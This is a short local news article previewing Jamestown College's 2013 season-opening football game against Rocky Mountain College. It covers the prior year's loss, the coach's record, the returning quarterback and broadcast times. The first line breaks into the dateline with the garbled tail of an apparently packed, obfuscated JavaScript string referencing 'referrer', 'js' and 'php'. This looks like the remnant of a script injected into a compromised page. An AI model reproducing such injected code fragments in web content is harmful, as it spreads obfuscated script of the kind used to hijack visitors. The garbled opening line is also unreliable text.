JAMESTOWN fertd|var|u0026u|referrer|eefnn||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- A trip to Miles City, MT is on the slate for the Jamestown College Football team on Friday night to open up the 2013 football season. The Jimmies will meet up with the Battlin’ Bears of Rocky Mountain College at a neutral site as they did to open 2012.

In that game, RMC got the better of Jamestown with a 38-19 victory. It was the first game for the Jimmies under coach Shawn Frank en route to a 4-6 campaign.

The Jimmies won their first game against South Dakota Mines in overtime and lost three others by a total of five points.

Jamestown College will return their starting quarterback Beau Ericksson, the sophomore from Devils Lake entered the starting line-up with a bang in a paint-bucket-stealing win at Valley City State and has not relinquished the job.

Kick-off for Friday night is slated for 7pm CT with the pregame show beginning at 6:30pm CT. You can catch the game on 1400 KQDJ and NewsDakota.com
